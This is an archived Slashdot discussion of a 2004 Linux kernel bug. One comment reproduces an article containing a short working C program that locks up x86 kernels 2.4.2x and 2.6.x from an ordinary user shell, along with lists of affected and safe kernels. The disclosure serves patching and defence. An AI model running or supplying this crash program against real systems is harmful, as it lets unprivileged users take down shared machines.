Slashdot Mirror


New Linux Kernel Crash-Exploit discovered

Ant writes " According to linuxreviews article's on 6/11/2004, there is a nasty bug that lets a simple C program crash the kernel (2.4.18-2.6.x reported so far), effectively locking the whole system. Affects both 2.4.2x and 2.6.x kernels on the x86 architecture. This exploit can be compiled and run without a root access and with a shell access. There are detailed information and source code mentioned. " You need to have shell access to run this program; it's also worth noting that not *all* flavors are vulnerable. Please read article for the full details.

5 of 691 comments (clear)

  1. Open Source Community shows its Value by data1 · · Score: -1, Redundant

    It shouldn't be long before a patch is issued to resolve this problem.
    Thank goodness for caffene loving geeks everywhere!

  2. In case of slashdotting... by Pig+Hogger · · Score: -1, Redundant

    (Looks crappy thanks to the lameness filter. Indeed this is a lame filter)

    New Kernel Crash-Exploit discovered
    Published 2004-06-11 by xiando, v2.1.4, last updated 2004-06-13.
    A bug lets a simple C program crash the kernel, effectively locking the whole system. Affects both 2.4.2x and 2.6.x kernels on the x86 architecture.
    The Evil Code
    The Crashing Kernels
    The safe kernels
    The threat
    How to protect yourself Patch for 2.4.2x (vanilla) Kernels 2.4.26 2.4.25 2.4.21 Kernel 2.4.26-rc3-gentoo 2.6.xx kernels
    Bug reports
    The Evil Code
    Running this simple C program crashes the Linux kernel.
    #include <sys/time.h>
    #include <signal.h>
    #include <unistd.h>

    static void Handler(int ignore)
    {
    char fpubuf[108];
    __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
    write(2, "*", 1);
    __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
    }

    int main(int argc, char *argv[])
    {
    struct itimerval spec;
    signal(SIGALRM, Handler);
    spec.it_interval.tv_sec=0;
    spec.it_interval.tv_usec=100;
    spec.it_value.tv_sec=0;
    spec.it_value.tv_usec=100;
    setitimer(ITIMER_REAL, &spec, NULL);
    while(1)
    write(1, ".", 1);

    return 0;
    }

    This bug is confirmed to be present when the code is compiled with GCC version 3.0, 3.1, 3.2, 3.3 and 3.3.2 and used on Linux kernel versions 2.4.2x and 2.6.x x86 systems.
    The Crashing Kernels
    Minor numbers are versions verified, this is just the top the iceberg:
    Linux 2.6.x 2.6.7-rc2 2.6.6 (vanilla) 2.6.6-rc1 SMP (varified by blaise) 2.6.6 SMP (verified by riven) 2.6.5-gentoo (verified by RatiX) 2.6.5-mm6 - (verified by Mariux) 2.6.5 (fedora core 2 vanilla) Linux 2.4.2x 2.4.26 vanilla 2.4.26, grsecurity 2.0 config 2.4.26-rc1 vanilla 2.4.26-gentoo-r1 2.4.22 2.4.22-1.2188 Fedora FC1 Kernel 2.4.18-bf2.4 (debian woody vanilla)
    Even grsecurity-patched kernels crash. "I would have hoped that grsec would have blocked or logged something, but nothing appeared in the logs." Vincent
    The safe kernels
    This code does nothing but exit with the error message Floating point exception and can not do any damage to systems running
    Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
    Linux Kernel 2.6.4 SMP patched with staircase scheduler Guille
    Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
    Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
    2.2.19-kernel
    It is unclear why these specific Gentoo patch sets of the 2.4.26 kernel are safe. Other versions of the Gentoo kernel are not. The user-mode Linux kernel 2.6.5-1um is safe. I assume this means other versions of user mode Linux are safe.
    Linux Kernel 2.6.4 SMP with patches has been reported to be safe. Reporter uses a version patched with Con Kolivas Staircase scheduler (but it only affects to the task scheduler). Gcc version 3.3.3. "System did not crash, I left the crash program 10 minutes and after that i killed the task and I continued using my system". Guille
    The glitch is verified present in Linux 2.5.6 SMP and Linux 2.6.6 SMP.
    The bug is not present in 2.2.19, it seems this bug only affects 2.4 and later.
    The threat
    Using this exploit to crash Linux systems requires the (ab)user to have shell access. The program works on any normal user account, root access is not required. This exploit has been reported used to take down several "lame free-shell providers" servers (this is illegal in most parts of the world and strongly discouraged).
    This code only works on x86 Linux machines. This code does not compile (makes no executable) on sparc64 sun4u TI UltraSparc II (BlackBird). This doesn't affect NetBSD Stable.
    Check your own system yourself if you are wondering if this affects you. Better safe than sorry. Assume it will crash, sync (even unmount) your file systems before testing. If your system is a production server with 1000 on line users then do not test this code on that box.
    How to protect yourself
    The last days were frustrating. Compiling a large number of diffe

  3. Re:This is another reason why C should be deprecat by DaHat · · Score: 0, Redundant

    You think that Fortran, Cobol and Perl have been retired?

    By any chance would you or anyone you know have a Citibank credit card? A fact you may not be aware of that most of Citibank's back end is written in Cobol. Federated Insurance is another organization that has plenty of Cobol based systems and when last I checked, neither company has any plan to change it.

    Yes, there are newer and possibly 'better' language out there, does that make them better in all such cases? Hell no.

    When speaking with a Federated representative she proudly said that their database backend system was completely Cobol based and was faster and more efficient then anything else on the market. It too me a little while to realize that she wasn't saying that it could process a days worth of transactions faster than anything else on the market with newer hardware, the issue was the cost of upgrading.

    If you have millions of lines of code in an older language and a database system that has been in place for 20+ years... it's not easy to upgrade no matter the advantages. If you worked for such a large company, it'd be pretty easy to sell something new, but do you want to guarantee a seamless transition from one system to another? Any hiccups along the way will most likely make the transition be regretted.

    Same goes for C. Yes, Java and other languages might be able to do a better job, the fact is that huge amounts of legacy code exists and needs to be supported.

    Example: Linux. Written in C primarily if I am not mistaken. How should it be fixed? Should it be ported to C++? VB? Java? C#? Such a conversion *may* be possible, however even if it were, the potential benefits to be realized are so inconsequential compared to the cost of doing so to make such an endeavor be wasted.

    Visual Basic that lacks such archaic coding styles, one will also note a serious speed increase over C.

    I'd suggest you do some research on that point. Raw C/C++ tends to be a hell of a lot faster than VB. Yes, you can often create a front end in VB much faster than you can in C. I would remind you though that in C/C++ you can create far more dynamic and elegant code for your task. In fact, the advantage of C++ over VB I think can be summed up in a single word: Inheritance.

    As a programmer who spends about 1/4th of his time working in embedded systems (not the niceties of XP embedded mind you, but micro controllers and other such horrors), I can tell you that VB has no place in such a world.

    Hell, I'd love to see an 8051 VB compiler, just to for a laugh.

  4. disable compiler access for non-trused shell users by hey · · Score: -1, Redundant

    There are zillions of programs that can crash or otherwise deplete all the resources on a system.
    Eg fork many processes, fill /tmp, tight loop that does nothing, etc.
    I am sure these types of programs would also cripple Windows boxes. I suppose the answer is not allow access to a compiler for non-trusted shell users.

  5. Re:Windows is obviously superior by nahdude812 · · Score: 0, Redundant

    In Soviet Windows, OS crashes YOU!